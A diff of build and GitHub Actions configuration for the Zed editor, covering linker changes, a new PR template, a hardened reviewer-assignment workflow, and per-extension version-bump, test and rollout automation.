Detailed changes
@@ -15,14 +15,4 @@ rustflags = ["-D", "warnings"]
[profile.dev]
debug = "limited"
-# Use Mold on Linux, because it's faster than GNU ld and LLD.
-#
-# We no longer set this in the default `config.toml` so that developers can opt in to Wild, which
-# is faster than Mold, in their own ~/.cargo/config.toml.
-[target.x86_64-unknown-linux-gnu]
-linker = "clang"
-rustflags = ["-C", "link-arg=-fuse-ld=mold"]
-[target.aarch64-unknown-linux-gnu]
-linker = "clang"
-rustflags = ["-C", "link-arg=-fuse-ld=mold"]
@@ -16,5 +16,9 @@ rustflags = [
"target-feature=+crt-static", # This fixes the linking issue when compiling livekit on Windows
]
+# We need lld to link libwebrtc.a successfully on aarch64-linux
+[target.aarch64-unknown-linux-gnu]
+rustflags = ["-C", "link-arg=-fuse-ld=lld"]
+
[env]
MACOSX_DEPLOYMENT_TARGET = "10.15.7"
@@ -40,4 +40,4 @@ body:
attributes:
value: |
Learn more about how feature requests work in our
- [Feature Request Guidelines](https://github.com/zed-industries/zed/discussions/47963).
+ [Feature Request Guidelines](https://github.com/zed-industries/zed/discussions/51422).
@@ -1,10 +1,28 @@
-Closes #ISSUE
+## Context
-Before you mark this PR as ready for review, make sure that you have:
-- [ ] Added a solid test coverage and/or screenshots from doing manual testing
-- [ ] Done a self-review taking into account security and performance aspects
-- [ ] Aligned any UI changes with the [UI checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist)
+<!-- What does this PR do, and why? How is it expected to impact users?
+ Not just what changed, but what motivated it and why this approach.
+
+ Link to Linear issue (e.g., ENG-123) or GitHub issue (e.g., Closes #456)
+ if one exists — helps with traceability. -->
+
+## How to Review
+
+<!-- Help reviewers focus their attention:
+ - For small PRs: note what to focus on (e.g., "error handling in foo.rs")
+ - For large PRs (>400 LOC): provide a guided tour — numbered list of
+ files/commits to read in order. (The `large-pr` label is applied automatically.)
+ - See the review process guidelines for comment conventions -->
+
+## Self-Review Checklist
+
+<!-- Check before requesting review: -->
+- [ ] I've reviewed my own diff for quality, security, and reliability
+- [ ] Unsafe blocks (if any) have justifying comments
+- [ ] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist)
+- [ ] Tests cover the new/changed behavior
+- [ ] Performance impact has been considered and is acceptable
Release Notes:
-- N/A *or* Added/Fixed/Improved ...
+- N/A or Added/Fixed/Improved ...
@@ -10,25 +10,43 @@
# AUTH NOTE: Uses a GitHub App (COORDINATOR_APP_ID + COORDINATOR_APP_PRIVATE_KEY)
# for all API operations: cloning the private coordinator repo, requesting team
# reviewers, and setting PR assignees. GITHUB_TOKEN is not used.
+#
+# SECURITY INVARIANTS (pull_request_target):
+# This workflow runs with access to secrets for ALL PRs including forks.
+# It is safe ONLY because:
+# 1. The checkout is the coordinator repo at ref: main — NEVER the PR head/branch
+# 2. No ${{ }} interpolation of event fields in run: blocks — all routed via env:
+# 3. The script never executes, sources, or reads files from the PR branch
+# Violating any of these enables remote code execution with secret access.
name: Assign Reviewers
on:
- pull_request:
+ # zizmor: ignore[dangerous-triggers] reviewed — no PR code checkout, only coordinator repo at ref: main
+ pull_request_target:
types: [opened, ready_for_review]
# GITHUB_TOKEN is not used — all operations use the GitHub App token.
# Declare minimal permissions so the default token has no write access.
permissions: {}
-# Only run for PRs from within the org (not forks) — fork PRs don't have
-# write access to request team reviewers.
+# Prevent duplicate runs for the same PR (e.g., rapid push + ready_for_review).
+concurrency:
+ group: assign-reviewers-${{ github.event.pull_request.number }}
+ cancel-in-progress: true
+
+# NOTE: For ready_for_review events, the webhook payload may still carry
+# draft: true due to a GitHub race condition (payload serialized before DB
+# update). We trust the event type instead — the script rechecks draft status
+# via a live API call as defense-in-depth.
+#
+# No author_association filter — external and fork PRs also get reviewer
+# assignments. Assigned reviewers are inherently scoped to org team members
+# by the GitHub Teams API.
jobs:
assign-reviewers:
if: >-
- github.event.pull_request.head.repo.full_name == github.repository &&
- github.event.pull_request.draft == false &&
- contains(fromJSON('["MEMBER", "OWNER"]'), github.event.pull_request.author_association)
+ github.event.action == 'ready_for_review' || github.event.pull_request.draft == false
runs-on: ubuntu-latest
steps:
- name: Generate app token
@@ -39,6 +57,8 @@ jobs:
private-key: ${{ secrets.COORDINATOR_APP_PRIVATE_KEY }}
repositories: codeowner-coordinator,zed
+ # SECURITY: checks out the coordinator repo at ref: main, NOT the PR branch.
+ # persist-credentials: false prevents the token from leaking into .git/config.
- name: Checkout coordinator repo
uses: actions/checkout@34e114876b0b11c390a56381ad16ebd13914f8d5 # v4.3.1
with:
@@ -54,7 +74,9 @@ jobs:
python-version: "3.11"
- name: Install dependencies
- run: pip install pyyaml==6.0.3
+ run: |
+ pip install --no-deps -q --only-binary ':all:' \
+ -r /dev/stdin <<< "pyyaml==6.0.3 --hash=sha256:b8bb0864c5a28024fac8a632c443c87c5aa6f215c0b126c449ae1a150412f31d"
- name: Assign reviewers
env:
@@ -69,7 +91,6 @@ jobs:
--rules-file team-membership-rules.yml \
--repo "$TARGET_REPO" \
--org zed-industries \
- --min-association member \
2>&1 | tee /tmp/assign-reviewers-output.txt
- name: Upload output
@@ -37,8 +37,6 @@ jobs:
path: ~/.rustup
- name: steps::setup_linux
run: ./script/linux
- - name: steps::install_mold
- run: ./script/install-mold
- name: steps::download_wasi_sdk
run: ./script/download-wasi-sdk
- name: steps::setup_pnpm
@@ -23,8 +23,8 @@ jobs:
uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683
with:
clean: false
- token: ${{ steps.get-app-token.outputs.token }}
ref: ${{ inputs.branch }}
+ token: ${{ steps.get-app-token.outputs.token }}
- name: bump_patch_version::run_bump_patch_version::bump_patch_version
run: |
channel="$(cat crates/zed/RELEASE_CHANNEL)"
@@ -30,8 +30,6 @@ jobs:
cp ./.cargo/ci-config.toml ./../.cargo/config.toml
- name: steps::setup_linux
run: ./script/linux
- - name: steps::install_mold
- run: ./script/install-mold
- name: steps::download_wasi_sdk
run: ./script/download-wasi-sdk
- name: compare_perf::run_perf::install_hyperfine
@@ -12,6 +12,9 @@ jobs:
if: (github.repository_owner == 'zed-industries' || github.repository_owner == 'zed-extensions')
name: Check formatting and Clippy lints
runs-on: namespace-profile-16x32-ubuntu-2204
+ env:
+ CC: clang
+ CXX: clang++
steps:
- name: steps::checkout_repo
uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683
@@ -29,8 +32,6 @@ jobs:
path: ~/.rustup
- name: steps::setup_linux
run: ./script/linux
- - name: steps::install_mold
- run: ./script/install-mold
- name: steps::download_wasi_sdk
run: ./script/download-wasi-sdk
- name: steps::cargo_fmt
@@ -42,6 +43,9 @@ jobs:
- style
name: Run tests
runs-on: namespace-profile-16x32-ubuntu-2204
+ env:
+ CC: clang
+ CXX: clang++
steps:
- name: steps::checkout_repo
uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683
@@ -59,8 +63,6 @@ jobs:
path: ~/.rustup
- name: steps::setup_linux
run: ./script/linux
- - name: steps::install_mold
- run: ./script/install-mold
- name: steps::download_wasi_sdk
run: ./script/download-wasi-sdk
- name: steps::cargo_install_nextest
@@ -0,0 +1,74 @@
+# Generated from xtask::workflows::extension_auto_bump
+# Rebuild with `cargo xtask workflows`.
+name: extension_auto_bump
+on:
+ push:
+ branches:
+ - main
+ paths:
+ - extensions/**
+ - '!extensions/slash-commands-example/**'
+ - '!extensions/test-extension/**'
+ - '!extensions/workflows/**'
+ - '!extensions/*.md'
+jobs:
+ detect_changed_extensions:
+ if: (github.repository_owner == 'zed-industries' || github.repository_owner == 'zed-extensions')
+ runs-on: namespace-profile-2x4-ubuntu-2404
+ steps:
+ - name: steps::checkout_repo
+ uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683
+ with:
+ clean: false
+ fetch-depth: 2
+ - id: detect
+ name: extension_auto_bump::detect_changed_extensions
+ run: |
+ COMPARE_REV="$(git rev-parse HEAD~1)"
+ CHANGED_FILES="$(git diff --name-only "$COMPARE_REV" "$GITHUB_SHA")"
+ # Detect changed extension directories (excluding extensions/workflows)
+ CHANGED_EXTENSIONS=$(echo "$CHANGED_FILES" | grep -oP '^extensions/[^/]+(?=/)' | sort -u | grep -v '^extensions/workflows$' || true)
+ if [ -n "$CHANGED_EXTENSIONS" ]; then
+ EXTENSIONS_JSON=$(echo "$CHANGED_EXTENSIONS" | jq -R -s -c 'split("\n") | map(select(length > 0))')
+ else
+ EXTENSIONS_JSON="[]"
+ fi
+ # Filter out newly added or entirely removed extensions
+ FILTERED="[]"
+ for ext in $(echo "$EXTENSIONS_JSON" | jq -r '.[]'); do
+ if git show HEAD~1:"$ext/extension.toml" >/dev/null 2>&1 && \
+ [ -f "$ext/extension.toml" ]; then
+ FILTERED=$(echo "$FILTERED" | jq -c --arg e "$ext" '. + [$e]')
+ fi
+ done
+ echo "changed_extensions=$FILTERED" >> "$GITHUB_OUTPUT"
+ outputs:
+ changed_extensions: ${{ steps.detect.outputs.changed_extensions }}
+ timeout-minutes: 5
+ bump_extension_versions:
+ needs:
+ - detect_changed_extensions
+ if: needs.detect_changed_extensions.outputs.changed_extensions != '[]'
+ permissions:
+ actions: write
+ contents: write
+ issues: write
+ pull-requests: write
+ strategy:
+ matrix:
+ extension: ${{ fromJson(needs.detect_changed_extensions.outputs.changed_extensions) }}
+ fail-fast: false
+ max-parallel: 1
+ uses: ./.github/workflows/extension_bump.yml
+ secrets:
+ app-id: ${{ secrets.ZED_ZIPPY_APP_ID }}
+ app-secret: ${{ secrets.ZED_ZIPPY_APP_PRIVATE_KEY }}
+ with:
+ working-directory: ${{ matrix.extension }}
+ force-bump: false
+concurrency:
+ group: ${{ github.workflow }}-${{ github.ref_name }}-${{ github.ref_name == 'main' && github.sha || 'anysha' }}
+ cancel-in-progress: true
+defaults:
+ run:
+ shell: bash -euxo pipefail {0}
@@ -17,6 +17,10 @@ on:
description: force-bump
required: true
type: boolean
+ working-directory:
+ description: working-directory
+ type: string
+ default: .
secrets:
app-id:
description: The app ID used to create the PR
@@ -42,8 +46,6 @@ jobs:
if [[ "$GITHUB_EVENT_NAME" == "pull_request" ]]; then
PR_FORK_POINT="$(git merge-base origin/main HEAD)"
git checkout "$PR_FORK_POINT"
- elif BRANCH_PARENT_SHA="$(git merge-base origin/main origin/zed-zippy-autobump)"; then
- git checkout "$BRANCH_PARENT_SHA"
else
git checkout "$(git log -1 --format=%H)"~1
fi
@@ -59,6 +61,10 @@ jobs:
version_changed: ${{ steps.compare-versions-check.outputs.version_changed }}
current_version: ${{ steps.compare-versions-check.outputs.current_version }}
timeout-minutes: 1
+ defaults:
+ run:
+ shell: bash -euxo pipefail {0}
+ working-directory: ${{ inputs.working-directory }}
bump_extension_version:
needs:
- check_version_changed
@@ -77,6 +83,11 @@ jobs:
uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683
with:
clean: false
+ - name: steps::cache_rust_dependencies_namespace
+ uses: namespacelabs/nscloud-cache-action@v1
+ with:
+ cache: rust
+ path: ~/.rustup
- name: extension_bump::install_bump_2_version
run: pip install bump2version --break-system-packages
- id: bump-version
@@ -94,29 +105,56 @@ jobs:
--no-configured-files "$BUMP_TYPE" "${BUMP_FILES[@]}"
if [[ -f "Cargo.toml" ]]; then
- cargo update --workspace
+ cargo +stable update --workspace
fi
NEW_VERSION="$(sed -n 's/^version = \"\(.*\)\"/\1/p' < extension.toml | tr -d '[:space:]')"
+ EXTENSION_ID="$(sed -n 's/^id = "\(.*\)"/\1/p' < extension.toml | head -1 | tr -d '[:space:]')"
+ EXTENSION_NAME="$(sed -n 's/^name = "\(.*\)"/\1/p' < extension.toml | head -1 | tr -d '[:space:]')"
+
+ if [[ "$WORKING_DIR" == "." || -z "$WORKING_DIR" ]]; then
+ {
+ echo "title=Bump version to ${NEW_VERSION}";
+ echo "body=This PR bumps the version of this extension to v${NEW_VERSION}";
+ echo "branch_name=zed-zippy-autobump";
+ } >> "$GITHUB_OUTPUT"
+ else
+ {
+ echo "title=${EXTENSION_ID}: Bump to v${NEW_VERSION}";
+ echo "body<<EOF";
+ echo "This PR bumps the version of the ${EXTENSION_NAME} extension to v${NEW_VERSION}.";
+ echo "";
+ echo "Release Notes:";
+ echo "";
+ echo "- N/A";
+ echo "EOF";
+ echo "branch_name=zed-zippy-${EXTENSION_ID}-autobump";
+ } >> "$GITHUB_OUTPUT"
+ fi
echo "new_version=${NEW_VERSION}" >> "$GITHUB_OUTPUT"
env:
OLD_VERSION: ${{ needs.check_version_changed.outputs.current_version }}
BUMP_TYPE: ${{ inputs.bump-type }}
+ WORKING_DIR: ${{ inputs.working-directory }}
- name: extension_bump::create_pull_request
uses: peter-evans/create-pull-request@v7
with:
- title: Bump version to ${{ steps.bump-version.outputs.new_version }}
- body: This PR bumps the version of this extension to v${{ steps.bump-version.outputs.new_version }}
- commit-message: Bump version to v${{ steps.bump-version.outputs.new_version }}
- branch: zed-zippy-autobump
+ title: ${{ steps.bump-version.outputs.title }}
+ body: ${{ steps.bump-version.outputs.body }}
+ commit-message: ${{ steps.bump-version.outputs.title }}
+ branch: ${{ steps.bump-version.outputs.branch_name }}
committer: zed-zippy[bot] <234243425+zed-zippy[bot]@users.noreply.github.com>
base: main
delete-branch: true
token: ${{ steps.generate-token.outputs.token }}
sign-commits: true
assignees: ${{ github.actor }}
- timeout-minutes: 3
+ timeout-minutes: 5
+ defaults:
+ run:
+ shell: bash -euxo pipefail {0}
+ working-directory: ${{ inputs.working-directory }}
create_version_label:
needs:
- check_version_changed
@@ -133,6 +171,21 @@ jobs:
uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683
with:
clean: false
+ - id: determine-tag
+ name: extension_bump::determine_tag
+ run: |
+ EXTENSION_ID="$(sed -n 's/^id = "\(.*\)"/\1/p' < extension.toml | head -1 | tr -d '[:space:]')"
+
+ if [[ "$WORKING_DIR" == "." || -z "$WORKING_DIR" ]]; then
+ TAG="v${CURRENT_VERSION}"
+ else
+ TAG="${EXTENSION_ID}-v${CURRENT_VERSION}"
+ fi
+
+ echo "tag=${TAG}" >> "$GITHUB_OUTPUT"
+ env:
+ CURRENT_VERSION: ${{ needs.check_version_changed.outputs.current_version }}
+ WORKING_DIR: ${{ inputs.working-directory }}
- name: extension_bump::create_version_tag
uses: actions/github-script@v7
with:
@@ -140,11 +193,17 @@ jobs:
github.rest.git.createRef({
owner: context.repo.owner,
repo: context.repo.repo,
- ref: 'refs/tags/v${{ needs.check_version_changed.outputs.current_version }}',
+ ref: 'refs/tags/${{ steps.determine-tag.outputs.tag }}',
sha: context.sha
})
github-token: ${{ steps.generate-token.outputs.token }}
+ outputs:
+ tag: ${{ steps.determine-tag.outputs.tag }}
timeout-minutes: 1
+ defaults:
+ run:
+ shell: bash -euxo pipefail {0}
+ working-directory: ${{ inputs.working-directory }}
trigger_release:
needs:
- check_version_changed
@@ -170,16 +229,85 @@ jobs:
EXTENSION_ID="$(sed -n 's/id = \"\(.*\)\"/\1/p' < extension.toml)"
echo "extension_id=${EXTENSION_ID}" >> "$GITHUB_OUTPUT"
- - name: extension_bump::release_action
- uses: huacnlee/zed-extension-action@v2
+ - id: extension-update
+ name: extension_bump::release_action
+ uses: huacnlee/zed-extension-action@82920ff0876879f65ffbcfa3403589114a8919c6
with:
extension-name: ${{ steps.get-extension-id.outputs.extension_id }}
push-to: zed-industries/extensions
- tag: v${{ needs.check_version_changed.outputs.current_version }}
+ tag: ${{ needs.create_version_label.outputs.tag }}
env:
COMMITTER_TOKEN: ${{ steps.generate-token.outputs.token }}
+ - name: extension_bump::enable_automerge_if_staff
+ uses: actions/github-script@v7
+ with:
+ github-token: ${{ steps.generate-token.outputs.token }}
+ script: |
+ const prNumber = process.env.PR_NUMBER;
+ if (!prNumber) {
+ console.log('No pull request number set, skipping automerge.');
+ return;
+ }
+
+ const author = process.env.GITHUB_ACTOR;
+ let isStaff = false;
+ try {
+ const response = await github.rest.teams.getMembershipForUserInOrg({
+ org: 'zed-industries',
+ team_slug: 'staff',
+ username: author
+ });
+ isStaff = response.data.state === 'active';
+ } catch (error) {
+ if (error.status !== 404) {
+ throw error;
+ }
+ }
+
+ if (!isStaff) {
+ console.log(`Actor ${author} is not a staff member, skipping automerge.`);
+ return;
+ }
+
+ // Assign staff member responsible for the bump
+ const pullNumber = parseInt(prNumber);
+
+ await github.rest.issues.addAssignees({
+ owner: 'zed-industries',
+ repo: 'extensions',
+ issue_number: pullNumber,
+ assignees: [author]
+ });
+ console.log(`Assigned ${author} to PR #${prNumber} in zed-industries/extensions`);
+
+ // Get the GraphQL node ID
+ const { data: pr } = await github.rest.pulls.get({
+ owner: 'zed-industries',
+ repo: 'extensions',
+ pull_number: pullNumber
+ });
+
+ await github.graphql(`
+ mutation($pullRequestId: ID!) {
+ enablePullRequestAutoMerge(input: { pullRequestId: $pullRequestId, mergeMethod: SQUASH }) {
+ pullRequest {
+ autoMergeRequest {
+ enabledAt
+ }
+ }
+ }
+ }
+ `, { pullRequestId: pr.node_id });
+
+ console.log(`Automerge enabled for PR #${prNumber} in zed-industries/extensions`);
+ env:
+ PR_NUMBER: ${{ steps.extension-update.outputs.pull-request-number }}
+ defaults:
+ run:
+ shell: bash -euxo pipefail {0}
+ working-directory: ${{ inputs.working-directory }}
concurrency:
- group: ${{ github.workflow }}-${{ github.ref_name }}-${{ github.ref_name == 'main' && github.sha || 'anysha' }}
+ group: ${{ github.workflow }}-${{ github.ref_name }}-${{ github.ref_name == 'main' && github.sha || 'anysha' }}extension-bump
cancel-in-progress: true
defaults:
run:
@@ -9,7 +9,12 @@ env:
RUSTUP_TOOLCHAIN: stable
CARGO_BUILD_TARGET: wasm32-wasip2
on:
- workflow_call: {}
+ workflow_call:
+ inputs:
+ working-directory:
+ description: working-directory
+ type: string
+ default: .
jobs:
orchestrate:
if: (github.repository_owner == 'zed-industries' || github.repository_owner == 'zed-extensions')
@@ -34,6 +39,14 @@ jobs:
fi
CHANGED_FILES="$(git diff --name-only "$COMPARE_REV" "$GITHUB_SHA")"
+ # When running from a subdirectory, git diff returns repo-root-relative paths.
+ # Filter to only files within the current working directory and strip the prefix.
+ REPO_SUBDIR="$(git rev-parse --show-prefix)"
+ REPO_SUBDIR="${REPO_SUBDIR%/}"
+ if [ -n "$REPO_SUBDIR" ]; then
+ CHANGED_FILES="$(echo "$CHANGED_FILES" | grep "^${REPO_SUBDIR}/" | sed "s|^${REPO_SUBDIR}/||" || true)"
+ fi
+
check_pattern() {
local output_name="$1"
local pattern="$2"
@@ -49,6 +62,10 @@ jobs:
outputs:
check_rust: ${{ steps.filter.outputs.check_rust }}
check_extension: ${{ steps.filter.outputs.check_extension }}
+ defaults:
+ run:
+ shell: bash -euxo pipefail {0}
+ working-directory: ${{ inputs.working-directory }}
check_rust:
needs:
- orchestrate
@@ -66,17 +83,31 @@ jobs:
path: ~/.rustup
- name: extension_tests::install_rust_target
run: rustup target add wasm32-wasip2
- - name: steps::cargo_fmt
- run: cargo fmt --all -- --check
+ - id: get-package-name
+ name: extension_tests::get_package_name
+ run: |
+ PACKAGE_NAME="$(sed -n 's/^name = "\(.*\)"/\1/p' < Cargo.toml | head -1 | tr -d '[:space:]')"
+ echo "package_name=${PACKAGE_NAME}" >> "$GITHUB_OUTPUT"
+ - name: extension_tests::cargo_fmt_package
+ run: cargo fmt -p "$PACKAGE_NAME" -- --check
+ env:
+ PACKAGE_NAME: ${{ steps.get-package-name.outputs.package_name }}
- name: extension_tests::run_clippy
- run: cargo clippy --release --all-features -- --deny warnings
+ run: cargo clippy -p "$PACKAGE_NAME" --release --all-features -- --deny warnings
+ env:
+ PACKAGE_NAME: ${{ steps.get-package-name.outputs.package_name }}
- name: steps::cargo_install_nextest
uses: taiki-e/install-action@nextest
- - name: steps::cargo_nextest
- run: 'cargo nextest run --workspace --no-fail-fast --no-tests=warn --target "$(rustc -vV | sed -n ''s|host: ||p'')"'
+ - name: extension_tests::run_nextest
+ run: 'cargo nextest run -p "$PACKAGE_NAME" --no-fail-fast --no-tests=warn --target "$(rustc -vV | sed -n ''s|host: ||p'')"'
env:
+ PACKAGE_NAME: ${{ steps.get-package-name.outputs.package_name }}
NEXTEST_NO_TESTS: warn
timeout-minutes: 6
+ defaults:
+ run:
+ shell: bash -euxo pipefail {0}
+ working-directory: ${{ inputs.working-directory }}
check_extension:
needs:
- orchestrate
@@ -97,8 +128,8 @@ jobs:
- name: extension_tests::download_zed_extension_cli
if: steps.cache-zed-extension-cli.outputs.cache-hit != 'true'
run: |
- wget --quiet "https://zed-extension-cli.nyc3.digitaloceanspaces.com/$ZED_EXTENSION_CLI_SHA/x86_64-unknown-linux-gnu/zed-extension"
- chmod +x zed-extension
+ wget --quiet "https://zed-extension-cli.nyc3.digitaloceanspaces.com/$ZED_EXTENSION_CLI_SHA/x86_64-unknown-linux-gnu/zed-extension" -O "$GITHUB_WORKSPACE/zed-extension"
+ chmod +x "$GITHUB_WORKSPACE/zed-extension"
- name: steps::cache_rust_dependencies_namespace
uses: namespacelabs/nscloud-cache-action@v1
with:
@@ -108,7 +139,7 @@ jobs:
run: |
mkdir -p /tmp/ext-scratch
mkdir -p /tmp/ext-output
- ./zed-extension --source-dir . --scratch-dir /tmp/ext-scratch --output-dir /tmp/ext-output
+ "$GITHUB_WORKSPACE/zed-extension" --source-dir . --scratch-dir /tmp/ext-scratch --output-dir /tmp/ext-output
- name: run_tests::fetch_ts_query_ls
uses: dsaltares/fetch-gh-release-asset@aa37ae5c44d3c9820bc12fe675e8670ecd93bd1c
with:
@@ -117,8 +148,8 @@ jobs:
file: ts_query_ls-x86_64-unknown-linux-gnu.tar.gz
- name: run_tests::run_ts_query_ls
run: |-
- tar -xf ts_query_ls-x86_64-unknown-linux-gnu.tar.gz
- ./ts_query_ls format --check . || {
+ tar -xf "$GITHUB_WORKSPACE/ts_query_ls-x86_64-unknown-linux-gnu.tar.gz" -C "$GITHUB_WORKSPACE"
+ "$GITHUB_WORKSPACE/ts_query_ls" format --check . || {
echo "Found unformatted queries, please format them with ts_query_ls."
echo "For easy use, install the Tree-sitter query extension:"
echo "zed://extension/tree-sitter-query"
@@ -132,8 +163,6 @@ jobs:
if [[ "$GITHUB_EVENT_NAME" == "pull_request" ]]; then
PR_FORK_POINT="$(git merge-base origin/main HEAD)"
git checkout "$PR_FORK_POINT"
- elif BRANCH_PARENT_SHA="$(git merge-base origin/main origin/zed-zippy-autobump)"; then
- git checkout "$BRANCH_PARENT_SHA"
else
git checkout "$(git log -1 --format=%H)"~1
fi
@@ -156,6 +185,10 @@ jobs:
VERSION_CHANGED: ${{ steps.compare-versions-check.outputs.version_changed }}
PR_USER_LOGIN: ${{ github.event.pull_request.user.login }}
timeout-minutes: 6
+ defaults:
+ run:
+ shell: bash -euxo pipefail {0}
+ working-directory: ${{ inputs.working-directory }}
tests_pass:
needs:
- orchestrate
@@ -184,7 +217,7 @@ jobs:
RESULT_CHECK_RUST: ${{ needs.check_rust.result }}
RESULT_CHECK_EXTENSION: ${{ needs.check_extension.result }}
concurrency:
- group: ${{ github.workflow }}-${{ github.ref_name }}-${{ github.ref_name == 'main' && github.sha || 'anysha' }}
+ group: ${{ github.workflow }}-${{ github.ref_name }}-${{ github.ref_name == 'main' && github.sha || 'anysha' }}extension-tests
cancel-in-progress: true
defaults:
run:
@@ -4,12 +4,57 @@ name: extension_workflow_rollout
env:
CARGO_TERM_COLOR: always
on:
- workflow_dispatch: {}
+ workflow_dispatch:
+ inputs:
+ filter-repos:
+ description: Comma-separated list of repository names to rollout to. Leave empty for all repos.
+ type: string
+ default: ''
+ change-description:
+ description: Description for the changes to be expected with this rollout
+ type: string
+ default: ''
jobs:
fetch_extension_repos:
if: (github.repository_owner == 'zed-industries' || github.repository_owner == 'zed-extensions') && github.ref == 'refs/heads/main'
runs-on: namespace-profile-2x4-ubuntu-2404
steps:
+ - name: checkout_zed_repo
+ uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683
+ with:
+ clean: false
+ fetch-depth: 0
+ - id: prev-tag
+ name: extension_workflow_rollout::fetch_extension_repos::get_previous_tag_commit
+ run: |
+ PREV_COMMIT=$(git rev-parse "extension-workflows^{commit}" 2>/dev/null || echo "")
+ if [ -z "$PREV_COMMIT" ]; then
+ echo "::error::No previous rollout tag 'extension-workflows' found. Cannot determine file changes."
+ exit 1
+ fi
+ echo "Found previous rollout at commit: $PREV_COMMIT"
+ echo "prev_commit=$PREV_COMMIT" >> "$GITHUB_OUTPUT"
+ - id: calc-changes
+ name: extension_workflow_rollout::fetch_extension_repos::get_removed_files
+ run: |
+ for workflow_type in "ci" "shared"; do
+ if [ "$workflow_type" = "ci" ]; then
+ WORKFLOW_DIR="extensions/workflows"
+ else
+ WORKFLOW_DIR="extensions/workflows/shared"
+ fi
+
+ REMOVED=$(git diff --name-status -M "$PREV_COMMIT" HEAD -- "$WORKFLOW_DIR" | \
+ awk '/^D/ { print $2 } /^R/ { print $2 }' | \
+ xargs -I{} basename {} 2>/dev/null | \
+ tr '\n' ' ' || echo "")
+ REMOVED=$(echo "$REMOVED" | xargs)
+
+ echo "Removed files for $workflow_type: $REMOVED"
+ echo "removed_${workflow_type}=$REMOVED" >> "$GITHUB_OUTPUT"
+ done
+ env:
+ PREV_COMMIT: ${{ steps.prev-tag.outputs.prev_commit }}
- id: list-repos
name: extension_workflow_rollout::fetch_extension_repos::get_repositories
uses: actions/github-script@v7
@@ -21,16 +66,42 @@ jobs:
per_page: 100,
});
- const filteredRepos = repos
+ let filteredRepos = repos
.filter(repo => !repo.archived)
.map(repo => repo.name);
+ const filterInput = `${{ inputs.filter-repos }}`.trim();
+ if (filterInput.length > 0) {
+ const allowedNames = filterInput.split(',').map(s => s.trim()).filter(s => s.length > 0);
+ filteredRepos = filteredRepos.filter(name => allowedNames.includes(name));
+ console.log(`Filter applied. Matched ${filteredRepos.length} repos from ${allowedNames.length} requested.`);
+ }
+
console.log(`Found ${filteredRepos.length} extension repos`);
return filteredRepos;
result-encoding: json
+ - name: steps::cache_rust_dependencies_namespace
+ uses: namespacelabs/nscloud-cache-action@v1
+ with:
+ cache: rust
+ path: ~/.rustup
+ - name: extension_workflow_rollout::fetch_extension_repos::generate_workflow_files
+ run: |
+ cargo xtask workflows "$COMMIT_SHA"
+ env:
+ COMMIT_SHA: ${{ github.sha }}
+ - name: extension_workflow_rollout::fetch_extension_repos::upload_workflow_files
+ uses: actions/upload-artifact@330a01c490aca151604b8cf639adc76d48f6c5d4
+ with:
+ name: extension-workflow-files
+ path: extensions/workflows/**/*.yml
+ if-no-files-found: error
outputs:
repos: ${{ steps.list-repos.outputs.result }}
- timeout-minutes: 5
+ prev_commit: ${{ steps.prev-tag.outputs.prev_commit }}
+ removed_ci: ${{ steps.calc-changes.outputs.removed_ci }}
+ removed_shared: ${{ steps.calc-changes.outputs.removed_shared }}
+ timeout-minutes: 10
rollout_workflows_to_extension:
needs:
- fetch_extension_repos
@@ -53,59 +124,28 @@ jobs:
permission-pull-requests: write
permission-contents: write
permission-workflows: write
- - name: checkout_zed_repo
- uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683
- with:
- clean: false
- fetch-depth: 0
- path: zed
- name: checkout_extension_repo
uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683
with:
clean: false
- token: ${{ steps.generate-token.outputs.token }}
path: extension
repository: zed-extensions/${{ matrix.repo }}
- - id: prev-tag
- name: extension_workflow_rollout::rollout_workflows_to_extension::get_previous_tag_commit
- run: |
- PREV_COMMIT=$(git rev-parse "extension-workflows^{commit}" 2>/dev/null || echo "")
- if [ -z "$PREV_COMMIT" ]; then
- echo "::error::No previous rollout tag 'extension-workflows' found. Cannot determine file changes."
- exit 1
- fi
- echo "Found previous rollout at commit: $PREV_COMMIT"
- echo "prev_commit=$PREV_COMMIT" >> "$GITHUB_OUTPUT"
- working-directory: zed
- - id: calc-changes
- name: extension_workflow_rollout::rollout_workflows_to_extension::get_removed_files
+ token: ${{ steps.generate-token.outputs.token }}
+ - name: extension_workflow_rollout::rollout_workflows_to_extension::download_workflow_files
+ uses: actions/download-artifact@018cc2cf5baa6db3ef3c5f8a56943fffe632ef53
+ with:
+ name: extension-workflow-files
+ path: workflow-files
+ - name: extension_workflow_rollout::rollout_workflows_to_extension::sync_workflow_files
run: |
+ mkdir -p extension/.github/workflows
+
if [ "$MATRIX_REPO" = "workflows" ]; then
- WORKFLOW_DIR="extensions/workflows"
+ REMOVED_FILES="$REMOVED_CI"
else
- WORKFLOW_DIR="extensions/workflows/shared"
+ REMOVED_FILES="$REMOVED_SHARED"
fi
- echo "Calculating changes from $PREV_COMMIT to HEAD for $WORKFLOW_DIR"
-
- # Get deleted files (status D) and renamed files (status R - old name needs removal)
- # Using -M to detect renames, then extracting files that are gone from their original location
- REMOVED_FILES=$(git diff --name-status -M "$PREV_COMMIT" HEAD -- "$WORKFLOW_DIR" | \
- awk '/^D/ { print $2 } /^R/ { print $2 }' | \
- xargs -I{} basename {} 2>/dev/null | \
- tr '\n' ' ' || echo "")
-
- REMOVED_FILES=$(echo "$REMOVED_FILES" | xargs)
-
- echo "Files to remove: $REMOVED_FILES"
- echo "removed_files=$REMOVED_FILES" >> "$GITHUB_OUTPUT"
- env:
- PREV_COMMIT: ${{ steps.prev-tag.outputs.prev_commit }}
- MATRIX_REPO: ${{ matrix.repo }}
- working-directory: zed
- - name: extension_workflow_rollout::rollout_workflows_to_extension::sync_workflow_files
- run: |
- mkdir -p extension/.github/workflows
cd extension/.github/workflows
if [ -n "$REMOVED_FILES" ]; then
@@ -119,18 +159,18 @@ jobs:
cd - > /dev/null
